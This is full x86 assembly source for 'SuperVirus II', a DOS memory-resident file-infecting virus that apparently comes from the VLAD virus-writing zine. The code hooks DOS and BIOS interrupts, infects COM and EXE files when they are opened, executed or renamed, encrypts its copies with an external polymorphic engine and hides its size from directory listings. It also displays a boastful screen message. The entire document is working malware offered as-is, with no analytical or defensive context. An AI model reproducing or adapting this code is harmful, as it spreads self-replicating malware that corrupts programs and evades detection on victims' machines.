; SuperVirus II
; by Burglar from Taiwan
; uses the PME engine by the same author.
.286
.MODEL SMALL
.CODE
EXTRN PME:NEAR, PME_END:NEAR
MOV AX,CS
ADD AX,30H
CALL $+3
POP BX
CMP BH,3
JE EEE
SUB AX,10H
EEE:
PUSH AX
PUSH OFFSET $+4
RETF
MOV AX,0ABCDH
INT 21H
CMP AX,0DCBAH
JNE TSR
CMP CS:C_E,0
JE COM
MOV AX,DS
ADD AX,10H
ADD CS:_SS,AX
ADD CS:_CS,AX
CLI
MOV SP,CS:_SP
MOV SS,CS:_SS
JMP DWORD PTR CS:_IP
COM:
PUSH DS
PUSH 100H
MOV SI,VIR_LEN+10H+100H+200H
MOV DI,100H
MOV CX,CS:LEN_LOW
CLD
CLI
INT 3
REP MOVSB
RETF
TSR:
MOV CS:FLAG,0
MOV CS:IN_VIR,0
MOV AX,DS
DEC AX
MOV DS,AX
MOV BX,DS:[3]
MOV AX,VIR_LEN+1FH
SHR AX,4
SUB BX,AX
MOV AH,4AH
INT 21H
MOV AX,5800H
INT 21H
PUSH AX
MOV AX,5802H
INT 21H
PUSH AX
MOV BX,82H
MOV AX,5801H
INT 21H
MOV BX,1
MOV AX,5803H
INT 21H
MOV BX,VIR_LEN+0FH
SHR BX,4
MOV AH,48H
INT 21H
MOV ES,AX
DEC AX
MOV DS,AX
MOV WORD PTR DS:[1],8
PUSH CS
POP DS
XOR SI,SI
XOR DI,DI
MOV CX,VIR_LEN
CLD
REP MOVSB
PUSH ES
PUSH OFFSET GO
RETF
GO:
MOV AH,4
INT 1AH
XOR DH,DL
JNZ QUIET
MOV AX,3508H
INT 21H
MOV WORD PTR CS:I8,BX
MOV WORD PTR CS:I8+2,ES
MOV DX,OFFSET INT8
PUSH CS
POP DS
MOV AX,2508H
INT 21H
QUIET:
POP BX
XOR BH,BH
MOV AX,5803H
INT 21H
POP BX
MOV AX,5801H
INT 21H
MOV AH,13H
INT 2FH
MOV CS:I_13H_IP,BX
MOV CS:I_13H_CS,ES
MOV AH,13H
INT 2FH
CALL GET_21H_ENTRY
;!!!
PUSH CS:I_21H_CS
POP CS:CS1
PUSH CS:I_21H_CS
POP CS:CS2
PUSH CS:I_21H_CS
POP CS:CS3
PUSH CS:I_21H_CS
POP CS:CS4
PUSH CS
POP CS:CS5
;INSTALL 1ST INT 21H
MOV SI,CS:I21HIP_F
MOV DI,OFFSET ORG1
MOV DS,CS:I_21H_CS
PUSH [SI]
POP CS:[DI]
PUSH [SI+2]
POP CS:[DI+2]
MOV AX,SI
ADD AX,5
MOV BL,[SI+4]
XOR BH,BH
ADD AX,BX
CMP [SI+4],BYTE PTR 80H
JB LOC8
SUB AX,100H
LOC8:
MOV CS:IP2,AX
PUSH CS:I21HIP_F
POP CS:IP1
ADD CS:IP1,5
MOV BYTE PTR [SI],0EAH
MOV WORD PTR [SI+1],OFFSET INT21H1
MOV [SI+3],CS
;INSTALL 2TH INT 21H
MOV SI,CS:I_21H_IP
MOV DI,OFFSET ORG2
MOV DS,CS:I_21H_CS
PUSH [SI]
POP CS:[DI]
PUSH [SI+2]
POP CS:[DI+2]
MOV AX,SI
ADD AX,5
MOV BL,[SI+4]
XOR BH,BH
ADD AX,BX
CMP [SI+4],BYTE PTR 80H
JB LOC9
SUB AX,100H
LOC9:
MOV CS:IP4,AX
PUSH CS:I_21H_IP
POP CS:IP3
ADD CS:IP3,5
MOV [SI],BYTE PTR 0EAH
MOV WORD PTR [SI+1],OFFSET INT21H2
MOV [SI+3],CS
MOV AH,51H
INT 21H
MOV DS,BX
MOV ES,BX
CMP CS:C_E,0
JE COM1
MOV AX,DS
ADD AX,10H
ADD CS:_SS,AX
ADD CS:_CS,AX
CLI
MOV SP,CS:_SP
MOV SS,CS:_SS
JMP DWORD PTR CS:_IP
COM1:
MOV SI,VIR_LEN+10H+100H+200H
MOV DI,100H
MOV CX,CS:LEN_LOW
CLD
REP MOVSB
PUSH DS
PUSH 100H
RETF
GET_21H_ENTRY PROC
PUSH AX
PUSH BX
PUSH CX
PUSH DS
MOV CS:FLAG,0
XOR AX,AX
MOV DS,AX
MOV BX,30H*4+1
LDS BX,[BX]
CMP BYTE PTR [BX],0EAH
JNE DOSHIGH
LDS BX,[BX+1]
DOSHIGH:
CMP WORD PTR [BX+6],2EFFH
JNE DOSLOW
MOV BX,[BX+8]
LDS BX,[BX]
DOSLOW:
MOV CX,2CH
ADD BX,25H
LOC_1:
CMP WORD PTR [BX],0FC80H
JNE LOC_2
MOV CS:I_21H_IP,BX
CMP CS:FLAG,0
JNE LOC_2
MOV CS:I21HIP_F,BX
NOT CS:FLAG
LOC_2:
INC BX
LOOP LOC_1
; ADD CS:I_21H_IP,5
MOV CS:I_21H_CS,DS ;INT 21H ENTRY OK!
POP DS
POP CX
POP BX
POP AX
RET
I21HIP_F DW 0
I_21H_IP DW 0
I_21H_CS DW 0
GET_21H_ENTRY ENDP
INT21H1 PROC
PUSHF
CMP AX,0ABCDH
JNE LOC1
MOV AX,0DCBAH
POPF
IRET
LOC1:
CMP AH,11H
JE DIR
CMP AH,12H
JE DIR
CMP AH,6CH
JNE LOC2
JMP JOB1
LOC2:
POPF
ORG1: DB 4 DUP (?)
DB 5
DB 0EAH
IP1 DW ?
CS1 DW ?
DB 0EAH
IP2 DW ?
CS2 DW ?
DIR:
DB 9AH
DW OFFSET ORG1
CS5 DW ?
PUSHF
CMP AL,0FFH
JNE L0841
POPF
RETF 2
L0841:
MOV CS:IN_VIR,1
MOV CS:D_J,0
PUSHA
PUSH DS
PUSH ES
MOV AH,2FH
INT 21H
MOV SI,BX
PUSH ES
POP DS
MOV DI,OFFSET BUFF
PUSH CS
POP ES
CLD
CMP BYTE PTR [SI],0FFH
JNE L1235
ADD SI,7
L1235:
CMP WORD PTR [SI+19H],0C800H
JB L1230
SUB WORD PTR [SI+19H],0C800H
SUB WORD PTR [SI+1DH],VIR_LEN+10H+200H
SBB WORD PTR [SI+1FH],0
JMP L4310
L1230:
LODSB
OR AL,AL
JZ L1537
ADD AL,40H
MOV AH,':'
STOSW
L1537:
MOV BP,SI
ADD BP,8
CMP WORD PTR [SI+8],'OC'
JNE L5242
CMP BYTE PTR [SI+10],'M'
JE L0546
L5242:
CMP WORD PTR [SI+8],'XE'
JNE L4310
CMP BYTE PTR [SI+10],'E'
JNE L4310
L0546:
LODSB
CMP AL,' '
JE L0647
L0246:
STOSB
CMP BP,SI
JNE L0546
L0647:
MOV AL,'.'
STOSB
MOV SI,BP
MOVSW
MOVSB
XOR AL,AL
STOSB
MOV DX,OFFSET BUFF
PUSH CS
POP DS
JMP J0
L4310:
MOV CS:IN_VIR,0
POP ES
POP DS
POPA
POPF
RETF 2
INT21H1 ENDP
INT21H2 PROC
PUSHF
CMP CS:IN_VIR,1
JE L2933
CMP AX,4200H
JE STEAL
CMP AX,4202H
JE STEAL
CMP AH,3DH
JE JOB1
CMP AH,43H
JE JOB1
CMP AH,4BH
JE JOB1
CMP AH,56H
JNE L2933
JOB1:
JMP JOB
L2933:
POPF
ORG2: DB 4 DUP (?)
DB 5
DB 0EAH
IP3 DW ?
CS3 DW ?
DB 0EAH
IP4 DW ?
CS4 DW ?
STEAL:
MOV CS:IN_VIR,1
PUSH DS
PUSH ES
PUSHA
MOV AX,5700H
INT 21H
CMP DX,0C800H
JNB L4156
MOV CS:IN_VIR,0
POPA
POP ES
POP DS
POPF
JMP ORG2
L4156:
XOR CX,CX
XOR DX,DX
MOV AX,4200H
INT 21H
MOV DX,OFFSET MZ
PUSH CS
POP DS
MOV CX,2
MOV AH,3FH
INT 21H
CMP CS:MZ,'ZM'
JE EXE8
POPA
OR AL,AL
JNE L5854
ADD DX,VIR_LEN+10H+200H
ADC CX,0
POP ES
POP DS
POPF
INT 21H
PUSHF
SUB AX,VIR_LEN+10H+200H
SBB DX,0
MOV CS:IN_VIR,0
POPF
RETF 2
L5854:
POP ES
POP DS
POPF
INT 21H
PUSHF
SUB AX,VIR_LEN+10H+200H
SBB DX,0
MOV CS:IN_VIR,0
POPF
RETF 2
EXE8:
POPA
CMP AL,2
JNE L3149
SUB DX,VIR_LEN+10H+200H
SBB CX,0
POP ES
POP DS
POPF
INT 21H
PUSHF
MOV CS:IN_VIR,0
POPF
RETF 2
L3149:
MOV CS:IN_VIR,0
POP ES
POP DS
POPF
JMP ORG2
JOB:
MOV CS:IN_VIR,1
MOV CS:D_J,1
PUSHA
PUSH DS
PUSH ES
CMP AH,6CH
JNE J0
MOV DX,SI
J0:
MOV WORD PTR CS:F_NAME,DX
MOV WORD PTR CS:F_NAME+2,DS
MOV SI,DX
CLD
OO: LODSB
OR AL,AL
JNZ OO
SUB SI,12
MOV DI,OFFSET _COMM
PUSH CS
POP ES
MOV CX,11
REPE CMPSB
JNE NOT_COMM
JMP EXIT
NOT_COMM:
MOV DX,WORD PTR CS:F_NAME
MOV AX,3D00H
PUSHF
CALL DWORD PTR CS:IP3
MOV BX,AX
MOV AX,5700H
INT 21H
MOV AH,3EH
INT 21H
CMP DX,0C800H
JB COM_EXE
JMP EXIT
COM_EXE:
MOV CS:TIME,CX
MOV CS:DATE,DX
MOV SI,WORD PTR CS:F_NAME
MOV DS,WORD PTR CS:F_NAME+2
CLD
C0:
LODSB
OR AL,AL
JNZ C0
CMP WORD PTR [SI-3],'MO'
JNE C1
CMP WORD PTR [SI-5],'C.'
JE COM2
C1:
CMP WORD PTR [SI-3],'EX'
JNE C2
CMP WORD PTR [SI-5],'E.'
JE EXE2
C2:
JMP EXIT
COM2:
MOV CS:C_E,0
JMP INFECT
EXE2:
MOV CS:C_E,1
INFECT:
IN AL,21H
OR AL,1
OUT 21H,AL
MOV AX,3513H
INT 21H
MOV CS:O_13H_IP,BX
MOV CS:O_13H_CS,ES
MOV DX,CS:I_13H_IP
MOV DS,CS:I_13H_CS
MOV AX,2513H
INT 21H
MOV AX,3524H
INT 21H
MOV CS:O_24H_IP,BX
MOV CS:O_24H_CS,ES
MOV DX,OFFSET INT24H
PUSH CS
POP DS
MOV AX,2524H
INT 21H
MOV AH,52H
INT 21H
MOV DS,ES:[BX-2]
LL:
CMP DS:[0],BYTE PTR 'Z'
JE KK
MOV AX,DS
INC AX
ADD AX,WORD PTR DS:[3]
MOV DS,AX
JMP LL
KK:
MOV AX,DS
SUB AX,2000H
MOV CS:MEM,AX
MOV DX,WORD PTR CS:F_NAME
MOV DS,WORD PTR CS:F_NAME+2
MOV AX,4300H
INT 21H
MOV CS:ATTR,CX
XOR CX,CX
MOV AX,4301H
INT 21H
MOV AX,3D02H
PUSHF
CALL DWORD PTR CS:IP3
MOV BX,AX
MOV AH,45H
INT 21H
MOV CS:HANDLE,AX
MOV AH,3EH
INT 21H
CMP CS:C_E,0
JNE EXE3
MOV BX,CS:HANDLE
XOR CX,CX
XOR DX,DX
MOV AX,4202H
INT 21H
MOV CS:LEN_LOW,AX
MOV BX,CS:HANDLE
XOR CX,CX
XOR DX,DX
MOV AX,4200H
INT 21H
MOV ES,CS:MEM
XOR DX,DX
PUSH CS
POP DS
MOV CX,VIR_LEN
MOV BX,100H
CALL PME
PUSH DX
PUSH CX
ADD CX,10H
MOV DX,CX
MOV BX,CS:HANDLE
MOV CX,CS:LEN_LOW
MOV AH,3FH
PUSHF
CALL DWORD PTR CS:IP3
XOR CX,CX
XOR DX,DX
MOV AX,4200H
PUSHF
CALL DWORD PTR CS:IP3
POP CX
ADD CX,10H
ADD CX,CS:LEN_LOW
POP DX
MOV AH,40H
PUSHF
CALL DWORD PTR CS:IP3
JMP DONE
EXE3:
MOV DX,OFFSET BUF
PUSH CS
POP DS
MOV CX,18H
MOV BX,CS:HANDLE
MOV AH,3FH
INT 21H
PUSH CS:BUF+0EH
POP CS:_SS
PUSH CS:BUF+10H
POP CS:_SP
PUSH CS:BUF+14H
POP CS:_IP
PUSH CS:BUF+16H
POP CS:_CS
XOR CX,CX
XOR DX,DX
MOV AX,4202H
INT 21H
MOV CS:LEN_LOW,AX
MOV CS:LEN_HIGH,DX
MOV BX,AX
AND BX,0FH
ADD BX,VIR_LEN+200H
PUSH BX
ADD AX,10H
ADC DX,0
AND AX,0FFF0H
PUSH AX
PUSH DX
MOV BX,10H
DIV BX
SUB AX,CS:BUF+8 ;HEADER SIZE
MOV CS:BUF+0EH,AX ;SS
MOV CS:BUF+16H,AX ;CS
MOV CS:BUF+10H,VIR_LEN+100H+200H ;SP
MOV CS:BUF+14H,0 ;IP=0
POP DX
POP AX
POP BX
PUSH BX
PUSH AX
PUSH DX
ADD AX,BX
ADC DX,0
MOV BX,200H
DIV BX
OR DX,DX
JE LOC_6
INC AX
LOC_6:
MOV CS:BUF+2,DX
MOV CS:BUF+4,AX
XOR CX,CX
XOR DX,DX
MOV BX,CS:HANDLE
MOV AX,4200H
INT 21H
MOV DX,OFFSET BUF
PUSH CS
POP DS
MOV CX,18H
MOV AH,40H
PUSHF
CALL DWORD PTR CS:IP3
POP CX
POP DX
MOV AX,4200H
INT 21H
MOV ES,CS:MEM
XOR DX,DX
PUSH CS
POP DS
MOV CX,VIR_LEN
XOR BX,BX
CALL PME
POP CX
MOV BX,CS:HANDLE
MOV AH,40H
PUSHF
CALL DWORD PTR CS:IP3
DONE:
MOV CX,CS:TIME
MOV DX,CS:DATE
ADD DX,0C800H
MOV AX,5701H
INT 21H
MOV AH,3EH
INT 21H
MOV DX,WORD PTR CS:F_NAME
MOV DS,WORD PTR CS:F_NAME+2
MOV CX,CS:ATTR
MOV AX,4301H
INT 21H
IN AL,21H
AND AL,0FEH
OUT 21H,AL
MOV DX,CS:O_13H_IP
MOV DS,CS:O_13H_CS
MOV AX,2513H
INT 21H
MOV DX,CS:O_24H_IP
MOV DS,CS:O_24H_CS
MOV AX,2524H
INT 21H
EXIT:
CMP CS:D_J,0
JNE L2205
JMP L4310
L2205:
POP ES
POP DS
POPA
CMP AH,3DH
JE L2554
MOV CS:IN_VIR,0
POPF
JMP ORG2
L2554: ;OPEN FILE CONDITION...
POPF
INT 21H
PUSHF
MOV BX,AX
MOV CS:IN_VIR,0
XOR CX,CX
XOR DX,DX
MOV AX,4200H
INT 21H
MOV AX,BX
POPF
RETF 2
INT21H2 ENDP
INT24H PROC
XOR AL,AL
IRET
INT24H ENDP
INT8 PROC
PUSHA
PUSH DS
PUSH ES
MOV SI,OFFSET MSG
PUSH CS
POP DS
MOV DI,10
PUSH 0B800H
POP ES
CLD
IN AL,40H
MOV AH,AL
L4006: LODSB
OR AL,AL
JZ L3923
STOSW
JMP L4006
L3923:
POP ES
POP DS
POPA
DB 0EAH
I8 DD ?
INT8 ENDP
; data area
MEM DW ?
HANDLE DW ?
TIME DW ?
DATE DW ?
LEN_LOW DW 1
LEN_HIGH DW ?
BUF DW 18H/2 DUP (?)
_SS DW ?
_SP DW ?
_IP DW ?
_CS DW ?
F_NAME DD ?
I_13H_IP DW ?
I_13H_CS DW ?
O_13H_IP DW ?
O_13H_CS DW ?
O_24H_IP DW ?
O_24H_CS DW ?
ATTR DW ?
C_E DB ?
FLAG DB 0
D_J DB 0
BUFF DB 15 DUP (0)
IN_VIR DB 0
MZ DW 0
_COMM DB 'COMMAND.COM'
MSG DB 'Hello! This is [Super Virus-2] ... written by'
DB ' Burglar'
DB ' in Taipei, Taiwan',0
VIR_LEN EQU OFFSET PME_END
END
GET_FILENAME PROC
PUSH AX
PUSH BX
PUSH DS
MOV AH,51H
INT 21H
MOV DS,BX
MOV DS,[2CH]
XOR BX,BX
LOC_3:
CMP WORD PTR [BX],0
JE LOC_4
INC BX
JMP LOC_3
LOC_4:
ADD BX,4
MOV CS:F_OFS,BX
MOV CS:F_SEG,DS
POP DS
POP BX
POP AX
RET
F_OFS DW 0
F_SEG DW 0
GET_FILENAME ENDP
- VLAD #4 INDEX -